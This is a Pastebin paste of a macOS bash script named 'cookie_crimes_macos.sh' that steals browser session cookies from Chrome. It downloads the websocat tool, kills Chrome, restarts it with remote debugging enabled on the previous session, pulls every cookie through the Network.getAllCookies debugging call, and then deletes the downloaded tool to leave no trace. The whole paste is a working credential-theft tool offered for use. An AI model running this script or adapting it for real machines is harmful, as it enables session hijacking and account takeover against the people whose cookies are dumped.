Advertisement
FlyFar

cookie_crimes_macos.sh

Jul 24th, 2023
842
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 1.48 KB | Cybersecurity | 0 0
  1. #! /bin/bash
  2.  
  3. # Prints out the cookies for the currently open Chrome window. This will cause Chrome to close and then suddenly re-open when run. Not very stealthy, oops.
  4.  
  5. # Download websocat from github to make the websocket request.
  6. WEBSOCAT_URL="https://github.com/vi/websocat/releases/download/v1.5.0/websocat_mac"
  7. CHROME="/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"
  8. USER_DATA_DIR="$HOME/Library/Application Support/Google/Chrome"
  9. WEBSOCAT_PATH="$USER_DATA_DIR/websocat"
  10. COOKIE_PATH="$USER_DATA_DIR/Cookies"
  11.  
  12. # Download websocat
  13. curl -sL "$WEBSOCAT_URL" -o "$WEBSOCAT_PATH"
  14. chmod +x "$WEBSOCAT_PATH"
  15.  
  16. # Kill Chrome, and wait for the process to terminate.
  17. pkill Chrome 2>&1 >/dev/null && while pgrep Chrome >/dev/null;
  18.     do false;
  19. done;
  20.  
  21. # Start a new Chrome with  remote debugging enabled, restoring the previous session.
  22. "$CHROME" --user-data-dir="$USER_DATA_DIR" --remote-debugging-port=9222 --crash-dumps-dir="$USER_DATA_DIR" --restore-last-session 2>/dev/null 1>/dev/null &
  23.  
  24. # Wait for Remote Debugging to be available
  25. while true; do
  26.     curl -s 127.0.0.1:9222/json 2>&1 > /dev/null && break;
  27. done;
  28.  
  29.  
  30. # Make the websocket request and print the cookies to stdout.
  31. while true; do
  32.     echo 'Network.getAllCookies' | "$WEBSOCAT_PATH" -n1 --jsonrpc -B 50000000 $(curl -sg http://127.0.0.1:9222/json | grep webSocketDebuggerUrl | cut -d'"' -f4 | head -1) 2>/dev/null && break
  33. done;
  34.  
  35. # Delete websocat, leaving no trace, like a leaf on the wind.
  36. rm "$WEBSOCAT_PATH"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement